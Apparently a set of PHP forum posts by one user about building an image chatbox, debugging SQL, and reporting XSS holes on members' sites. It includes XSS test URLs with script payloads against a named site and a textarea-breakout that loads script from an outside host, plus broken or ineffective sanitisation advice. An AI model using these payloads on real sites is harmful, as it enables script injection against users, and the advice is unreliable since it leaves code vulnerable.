helraizer

I'm not sure if it's a inconsistency on just this post but you have Image.php and in the image source you're looking for image.php, I do believe it is case-sensitive. Your page is looking for http://www.penguinpolls.com/image.php but when you drag the image to the start bar you get Sam

htmlspecialchars($var); will do the trick. Sam

http://www.imperialized.net/view_profile.php?user[] XSS http://www.imperialized.net/view_profile.php?user=%3Cmarquee%20direction=right%20behavior=alternate%3Evunerable%3C/marquee%3E XSS http://www.imperialized.net/view_profile.php?user=%3Cscript%3Ealert(1);%3C/script%3E

the user can't change the background, but I can, easily. In the not so distant future I will be developing a user system so people can get their own chatboxes (if they so desired), then there would be a choice of backgrounds for them, a word censor list, choice of colours (depending on background image) and choice of different fonts too, possibly other tools. Any ideas for some? Sam

At the moment it is done by IP, and just incase the user uses broadband and their IP doesn't reset, they can only edit it within 72 hours. I am going to use a different way in the near future but for now it's IP. Sam

Is it me or did something just happen to the forum? Some table didn't exist a second ago and now loads of posts were just deleted... Wow, this'll show my clairvoyance: KeeB, for the question you asked in the post after this one (): The idea behind it is that it is an image based chatbox that can be used as a forum signature, or other. So you can have a chat with your friends which can be then viewed outside the realms of your site. I can link it here, for instance: I've changed all the images to gif now, so they should load quicker. Before they were png. Sam

I used to save to file but it made post manipulation (deletion and editing) a nightmare, so now it's all done by database. Sam

Hi folks, http://www.helraizer.co.uk/mychatbox/ I just moved my chatbox to a database rather than file for ease of use and accessibility. The user now has the option to delete posts etc.. later the user will be able to edit their posts etc... I am aware that the database aspect means there are more risks, could you guys please test it out and leave feedback. I'm pretty sure it's well protected but I may have missed something. If you cannot find any risks, could you let me know also. Thanks, Sam

if the message is sent to the email use htmlspecialchars($_POST['newmessage']); Which will convert " to &quote; which will still look like " in the email but won't break it in the html. That, or in the php code you use to write the message with the ' or " use \' or \" which should escape them. Sam

To get page inside the iFrame, have you HTML to set up the page and the frame as normal then use <iframe src="<?php include ('page.dhtml'); /*or whatever*/ ?>"> or do you not want it in the iframe? In theory you can use the target element of 'a' <a href="whatever.dhtml" target="_parent">. Sam

Umm.. I think you'll have to improvise on this one. There is no easy way to create arced text as a whole, as such that I know of.. But with imagettftext: imagettftext ( resource $image , float $size , float $angle , int $x , int $y , int $color , string $fontfile , string $text ) the third element is float angle, which you can set to face the character facing from 0 to 359 degrees. If you have $string, you can use $str_split($string, 1) to split the string up into one character chunks. Then use imagettftext for all of them, using a slightly different angle for each and a slightly different x and y co-ord. Will give an arced effect, with experimenting. Hope that helps? Sam

I did/am currently doing so.

it's .ip because it uses the comment id and user ip to make sure they can only delete their own posts. won't `tblip.ip` and `tblcomments.id` now look for a column called tblcomments.id rather than a column called id in tblcomments? (hope that made some sense ). The error appears to be coming from the fact I'm using the two tables in the FROM clause, but I take out leave it as: "DELETE FROM tblcomments WHERE tblcomments.id='$comment_id' AND tblip.ip = '$my_ip'" then it says . Is it possible to use INNER JOIN in a DELETE statement? Sam

so that's not quite true but still, I deleted the * from the command and now I get: Sam

Hi folks, I'm moving my image based chatbox to a database system, currently I am working on the post deletion aspect of it. I have this code (mysql connection in seperate file, working perfectly) delete.php5 - <?php //only using tags to get syntax highlighting. $sqlx = "SELECT * FROM tblcomments INNER JOIN tblip ON tblcomments.id = `tblip`.`id` ORDER BY tblcomments.`id`"; $resultx = mysql_query($sqlx) or die("Error in part X: ".mysql_error()); while ($row = mysql_fetch_array($resultx)) { $ip = $_SERVER['REMOTE_ADDR']; $id = $row['id']; if($ip == $row['ip']) { $message = $row['comment']; echo '<table align="center"><tr><td>'; echo '<a href="?comment_id='.$id.'">delete comment: "'.$message.'"</a>'; echo '</td></tr></table>'; if (isset($_GET['comment_id']) && is_numeric($_GET['comment_id'])) { $comment_id = $_GET['comment_id']; $my_ip = $_SERVER['REMOTE_ADDR']; $sql1 = "SELECT * FROM tblcomments INNER JOIN tblattributes ON tblcomments.id = tblattributes.id INNER JOIN tblip ON tblattributes.id = tblip.id WHERE `tblcomments`.`id`='$comment_id'"; $result1 = mysql_query($sql1) or die("Error perforing 1 :" . mysql_error()); while ($row = mysql_fetch_array($result1)) { if ($my_ip === $row['ip'] && $comment_id === $row['id']) { $comment_id = $_GET['comment_id']; $my_ip = $_SERVER['REMOTE_ADDR']; $sql2 = "DELETE * FROM `tblcomments`, `tblip` WHERE `tblcomments`.`id`='$comment_id' AND `tblip`.`ip`= '$my_ip'"; $result = mysql_query($sql2) or die("Error performing 2 :" . mysql_error()); die("Post deletion successful <br><br> Please click <a href='./index.php5'>here</a> to go back. <br><br> Thank you!"); } else { $error = _NO_POST; $_SESSION['post'] = $error; header('Location: index.php5'); exit(); } } } else { die('<div class="ddgb_entrybox"> <table width="100%" border="0" cellspacing="8" cellpadding="0"> <tr> <td width="42%" align="right" valign="top"></td> <td align="center" valign="top"> <h2> '. _ERROR . '</h2><ul> <li> '. _MAL . '</li> </ul> <br><br><br> </td> </tr> </table> </div>'); } } } ?> Error given: This corresponds to this part of the code: $sql2 = "DELETE * FROM `tblcomments`, `tblip` WHERE `tblcomments`.`id`='$comment_id' AND `tblip`.`ip`= '$my_ip'"; $result = mysql_query($sql2) or die("Error performing 2 :" . mysql_error()); For the life of me I can't work out why there is an error.. am I missing something obvious? Thanks, Sam

It depends what the use of the script is. If it has a function but does not return a value then white is good because it means it worked. If you want to see errors, in your code, at the top add: error_reporting(E_ALL); ini_set("display_errors", true); That will show every type of error. Notice, Warning, Fatal etc.. Sam

To protect against the XSS you can use preg_replace. preg_replace("/textarea/i","",$textarea); // so if anyone uses the work textarea in the textarea (comment) it will delete the word so if they used </textarea> it'd just give </> you can also use preg_replace for other things like preg_replace("/</","<",$textarea); preg_replace("/>/",">",$textarea); which should change </script> to </script> which will render XSS not possible.

You should word wrap comments. If you look now the comments area is really wide because I said this without any spaces and it broke the formatting. Sam

uh oh! hehehehe looks like you got work to do Told you there was a flaw. =P He can easily fix it by taking the "</textarea><script src=http://www.helraizer.co.uk/xss1.js></script>" out of the code.

The site is protected on the main viewing of the page but now on editing there is a big XSS flaw. I was able to inject Javascript from my website, which could be potentially very bad for you. Sam

Cool cool. If you have any trouble post the code, we'll try and help.

No problem, glad I could help. Just for information there are these built-in php functions is_array(); - to see if the variable is an array. is_bool(); - to see if the variable is a boolean (True/False) is_callable(); - to see if the contents of a variable can be called as a function. is_double() ||is_float() || is_real(); - to see if the contents of a variable is a float is_int() || is_integer() || is_long; - to see if the variable is an integer (whole number) is_null(); - to see if a variable is null. is_numeric(); - to see if the variable is a number. is_object(); - to see if the variable is an object. is_resource(); - to see if the variable is a resource (like mysql_connect) is_scalar(); - to see if the variable is either integer, float, string or boolean. is_string(); - to see if the variable is a string. Sam

The main problem is when you press Go! it says this:

What code do you have around line 316? Could you please post it? From what you've said I'm guessing you could use similar to what I've said earlier if(is_string($activation)) { //run your code } else { //throw error. } Although that might not stop it because of mysql_real_escape_string(); you could use preg_replace("/[]/","",$_SERVER['PHP_SELF']; that will look in the URL (after the .com or similar extension) for any [] square brackets and delete them. The "" replaces the [] with nothing, just deletes them. That should work but you'll be left with index.php?p=act&u&id so maybe preg_replace("/[]/","=",$_SERVER['PHP_SELF']; which will give index.php?p=act&u=&id= Sam

It doesn't give you any errors but it does says "Page 7 of 2" or page "3000625 of 2" which doesn't really look to professional. Say you're using switch($page) { case 1 : $page_to_display = "www.mysite.com/page1"; break; case 2 : $page_to_display = "www.mysite.com/page2"; break; default : $page_to_display = "www.mysite.com/page1"; break; } you should add this code before the switch statement: if($page == 1 || $page == 2) { //switch statement } else { //throw them an error saying "Invalid page number" or similar } Sam